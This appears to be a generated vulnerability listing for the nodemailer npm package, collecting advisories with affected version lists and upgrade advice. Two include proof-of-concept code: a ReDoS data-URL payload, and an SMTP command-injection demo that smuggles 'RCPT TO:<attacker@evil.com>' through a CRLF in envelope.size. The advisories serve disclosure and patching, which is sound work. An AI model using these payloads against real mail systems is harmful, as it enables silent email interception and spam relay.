NodeJS/nodemailer/0.2.1


Easy as cake e-mail sending from your Node.js applications

https://www.npmjs.com/package/nodemailer
MIT

8 Security Vulnerabilities

Duplicate Advisory: Nodemailer is vulnerable to DoS through Uncontrolled Recursion

Published date: 2025-12-18T09:30:30Z
CVE: CVE-2025-14874
Links:

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-rcmh-qjqh-p98v. This link is maintained to preserve external references.

Original Description

A flaw was found in Nodemailer. This vulnerability allows a denial of service (DoS) via a crafted email address header that triggers infinite recursion in the address parser.

Affected versions: ["7.0.10", "7.0.9", "7.0.7", "7.0.6", "7.0.5", "7.0.4", "7.0.3", "7.0.2", "7.0.1", "7.0.0", "6.10.1", "6.10.0", "6.9.16", "6.9.15", "6.9.14", "6.9.13", "6.9.12", "6.9.11", "6.9.10", "6.9.9", "6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Command injection in nodemailer

Published date: 2021-05-10T19:16:52Z
CVE: CVE-2020-7769
Links:

This affects the package nodemailer before 6.4.16. Use of crafted recipient email addresses may result in arbitrary command flag injection in sendmail transport for sending mails.

Affected versions: ["6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

nodemailer ReDoS when trying to send a specially crafted email

Published date: 2024-01-31T22:42:54Z
Links:

Summary

A ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter attachDataUrls set, causing the stuck of event loop. Another flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop.

Details

Regex: /^data:((?:[^;];)(?:[^,])),(.)$/

Path: compile -> getAttachments -> _processDataUrl

Regex: /(]* src\s=[\s"'])(data:([^;]+);[^"'>\s]+)/

Path: _convertDataImages

PoC

https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6 https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698

async function exploit() {
   const MailComposer = require(\"nodemailer/lib/mail-composer\");
   const MailComposerObject = new MailComposer();

   // Create a malicious data URL that will cause excessive backtracking
   // This data URL is crafted to have a long sequence of characters that will cause the regex to backtrack
   const maliciousDataUrl = 'data:image/png;base64,' + 'A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;'.repeat(1000) + '==';

   // Call the vulnerable method with the crafted input
   const result = await MailComposerObject._processDataUrl({ path: maliciousDataUrl });
}

await exploit();

Impact

ReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.

Affected versions: ["6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter

Published date: 2026-03-26T22:26:46Z
Links:

Summary

When a custom envelope object is passed to sendMail() with a size property containing CRLF characters (\r\n), the value is concatenated directly into the SMTP MAIL FROM command without sanitization. This allows injection of arbitrary SMTP commands, including RCPT TO — silently adding attacker-controlled recipients to outgoing emails.

Details

In lib/smtp-connection/index.js (lines 1161-1162), the envelope.size value is concatenated into the SMTP MAIL FROM command without any CRLF sanitization:

if (this._envelope.size && this._supportedExtensions.includes('SIZE')) {
    args.push('SIZE=' + this._envelope.size);
}

This contrasts with other envelope parameters in the same function that ARE properly sanitized: - Addresses (from, to): validated for [\r\n<>] at lines 1107-1127 - DSN parameters (dsn.ret, dsn.envid, dsn.orcpt): encoded via encodeXText() at lines 1167-1183

The size property reaches this code path through MimeNode.setEnvelope() in lib/mime-node/index.js (lines 854-858), which copies all non-standard envelope properties verbatim:

const standardFields = ['to', 'cc', 'bcc', 'from'];
Object.keys(envelope).forEach(key => {
    if (!standardFields.includes(key)) {
        this._envelope[key] = envelope[key];
    }
});

Since _sendCommand() writes the command string followed by \r\n to the raw TCP socket, a CRLF in the size value terminates the MAIL FROM command and starts a new SMTP command.

Note: by default, Nodemailer constructs the envelope automatically from the message's from/to fields and does not include size. This vulnerability requires the application to explicitly pass a custom envelope object with a size property to sendMail(). While this limits the attack surface, applications that expose envelope configuration to users are affected.

PoC

ave the following as poc.js and run with node poc.js:

const net = require('net');
const nodemailer = require('nodemailer');

// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
    socket.write('220 localhost ESMTP\r\n');
    let buffer = '';
    socket.on('data', chunk => {
        buffer += chunk.toString();
        const lines = buffer.split('\r\n');
        buffer = lines.pop();
        for (const line of lines) {
            if (!line) continue;
            console.log('C:', line);
            if (line.startsWith('EHLO')) {
                socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
            } else if (line.startsWith('MAIL FROM')) {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('RCPT TO')) {
                socket.write('250 OK\r\n');
            } else if (line === 'DATA') {
                socket.write('354 Start\r\n');
            } else if (line === '.') {
                socket.write('250 OK\r\n');
            } else if (line.startsWith('QUIT')) {
                socket.write('221 Bye\r\n');
                socket.end();
            }
        }
    });
});

server.listen(0, '127.0.0.1', () => {
    const port = server.address().port;
    console.log('SMTP server on port', port);
    console.log('Sending email with injected RCPT TO...\n');

    const transporter = nodemailer.createTransport({
        host: '127.0.0.1',
        port,
        secure: false,
        tls: { rejectUnauthorized: false },
    });

    transporter.sendMail({
        from: 'sender@example.com',
        to: 'recipient@example.com',
        subject: 'Normal email',
        text: 'This is a normal email.',
        envelope: {
            from: 'sender@example.com',
            to: ['recipient@example.com'],
            size: '100\r\nRCPT TO:<attacker@evil.com>',
        },
    }, (err) => {
        if (err) console.error('Error:', err.message);
        console.log('\nExpected output above:');
        console.log('  C: MAIL FROM:<sender@example.com> SIZE=100');
        console.log('  C: RCPT TO:<attacker@evil.com>        <-- INJECTED');
        console.log('  C: RCPT TO:<recipient@example.com>');
        server.close();
        transporter.close();
    });
});

Expected output: ``` SMTP server on port 12345 Sending email with injected RCPT TO...

C: EHLO [127.0.0.1] C: MAIL FROM:sender@example.com SIZE=100 C: RCPT TO:attacker@evil.com C: RCPT TO:recipient@example.com C: DATA ... C: . C: QUIT ```

The RCPT TO:<attacker@evil.com> line is injected by the CRLF in the size field, silently adding an extra recipient to the email.

Impact

This is an SMTP command injection vulnerability. An attacker who can influence the envelope.size property in a sendMail() call can:

  • Silently add hidden recipients to outgoing emails via injected RCPT TO commands, receiving copies of all emails sent through the affected transport
  • Inject arbitrary SMTP commands (e.g., RSET, additional MAIL FROM to send entirely separate emails through the server)
  • Leverage the sending organization's SMTP server reputation for spam or phishing delivery

The severity is mitigated by the fact that the envelope object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include size. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.

Affected versions: at least v8.0.3 (current); likely all versions where envelope.size is supported.

Affected versions: ["8.0.3", "8.0.2", "8.0.1", "8.0.0", "7.0.13", "7.0.12", "7.0.11", "7.0.10", "7.0.9", "7.0.7", "7.0.6", "7.0.5", "7.0.4", "7.0.3", "7.0.2", "7.0.1", "7.0.0", "6.10.1", "6.10.0", "6.9.16", "6.9.15", "6.9.14", "6.9.13", "6.9.12", "6.9.11", "6.9.10", "6.9.9", "6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Header injection in nodemailer

Published date: 2021-12-10T18:56:57Z
CVE: CVE-2021-23400
Links:

The package nodemailer before 6.6.1 are vulnerable to HTTP Header Injection if unsanitized user input that may contain newlines and carriage returns is passed into an address object.

Affected versions: ["6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", "1.0.0", "1.0.0-rc.1", "0.7.1", "0.7.0", "0.6.5", "0.6.4", "0.6.3", "0.6.2", "0.6.1", "0.6.0", "0.5.15", "0.5.14", "0.5.13", "0.5.12", "0.5.11", "0.5.10", "0.5.9", "0.5.8", "0.5.7", "0.5.6", "0.5.5", "0.5.4", "0.5.3", "0.5.2", "0.5.1", "0.5.0", "0.4.4", "0.4.3", "0.4.2", "0.4.1", "0.4.0", "0.3.44", "0.3.43", "0.3.42", "0.3.41", "0.3.40", "0.3.39", "0.3.38", "0.3.37", "0.3.35", "0.3.34", "0.3.33", "0.3.32", "0.3.31", "0.3.30", "0.3.29", "0.3.28", "0.3.27", "0.3.26", "0.3.25", "0.3.24", "0.3.23", "0.3.22", "0.3.21", "0.3.20", "0.3.19", "0.3.18", "0.3.17", "0.3.16", "0.3.15", "0.3.14", "0.3.13", "0.3.12", "0.3.11", "0.3.10", "0.3.9", "0.3.8", "0.3.7", "0.3.6", "0.3.5", "0.3.4", "0.3.3", "0.3.2", "0.3.1", "0.3.0", "0.2.4", "0.2.3", "0.2.2", "0.2.1", "0.2.0", "0.1.24", "0.1.23", "0.1.22", "0.1.21", "0.1.20", "0.1.19", "0.1.18", "0.1.17", "0.1.16", "0.1.15", "0.1.14", "0.1.13", "0.1.12", "0.1.11", "0.1.10", "0.1.9", "0.1.8", "0.1.7", "0.1.6", "0.1.5", "0.1.4", "0.1.3", "0.1.2", "0.1.1"]
Secure versions: [8.0.4]
Recommendation: Update to version 8.0.4.

Duplicate Advisory: Nodemailer: Email to an unintended domain can occur due to Interpretation Conflict

Published date: 2025-11-14T21:30:29Z
Links:

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-mm7p-fcc7-pg87. This link is maintained to preserve external references.

Original Description

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

Affected versions: ["7.0.6", "7.0.5", "7.0.4", "7.0.3", "7.0.2", "7.0.1", "7.0.0", "6.10.1", "6.10.0", "6.9.16", "6.9.15", "6.9.14", "6.9.13", "6.9.12", "6.9.11", "6.9.10", "6.9.9", "6.9.8", "6.9.7", "6.9.6", "6.9.5", "6.9.4", "6.9.3", "6.9.2", "6.9.1", "6.9.0", "6.8.0", "6.7.8", "6.7.7", "6.7.6", "6.7.5", "6.7.4", "6.7.3", "6.7.2", "6.7.1", "6.7.0", "6.6.5", "6.6.4", "6.6.3", "6.6.2", "6.6.1", "6.6.0", "6.5.0", "6.4.18", "6.4.17", "6.4.16", "6.4.15", "6.4.14", "6.4.13", "6.4.12", "6.4.11", "6.4.10", "6.4.8", "6.4.7", "6.4.6", "6.4.5", "6.4.4", "6.4.3", "6.4.2", "6.4.1", "6.4.0", "6.3.1", "6.3.0", "6.2.1", "6.1.1", "6.1.0", "6.0.0", "5.1.1", "5.1.0", "5.0.1", "5.0.0", "4.7.0", "4.6.8", "4.6.7", "4.6.6", "4.6.5", "4.6.4", "4.6.3", "4.6.2", "4.6.1", "4.6.0", "4.5.0", "4.4.2", "4.4.1", "4.4.0", "4.3.1", "4.3.0", "4.2.0", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.1", "4.0.0", "3.1.8", "3.1.7", "3.1.6", "3.1.5", "3.1.4", "3.1.3", "3.1.2", "3.1.1", "3.1.0", "3.0.2", "3.0.1", "3.0.0", "2.7.2", "2.7.1", "2.7.0", "2.6.4", "2.6.3", "2.6.2", "2.6.1", "2.6.0", "2.5.0", "2.4.2", "2.4.1", "2.4.0", "2.4.0-beta.0", "2.3.2", "2.3.1", "2.3.1-rc.0", "2.3.0", "2.3.0-rc.3", "2.3.0-rc.2", "2.3.0-beta.1", "2.3.0-beta.0", "2.2.1", "2.2.0", "2.2.0-rc.11", "2.2.0-rc.10", "2.2.0-rc.9", "2.2.0-rc.8", "2.2.0-rc.7", "2.2.0-beta.6", "2.2.0-beta.5", "2.2.0-beta.4", "2.2.0-beta.3", "2.2.0-beta.2", "2.2.0-beta.1", "2.2.0-beta.0", "2.1.0", "2.1.0-rc.1", "2.1.0-rc.0", "2.1.0-beta.3", "2.1.0-beta.2", "2.1.0-beta.1", "2.1.0-beta.0", "2.0.0", "2.0.0-rc.2", "2.0.0-rc.1", "2.0.0-beta.2", "2.0.0-beta.1", "2.0.0-beta.0", "1.11.0", "1.10.0", "1.9.0", "1.8.0", "1.7.0", "1.6.0", "1.5.0", "1.4.0", "1.3.4", "1.3.3", "1.3.2", "1.3.1", "1.3.0", "1.2.2", "1.2.1", "1.2.0", "1.1.2", "1.1.1", "1.1.0", "1.0.4", "1.0.3", "1.0.2", "1.0.1", 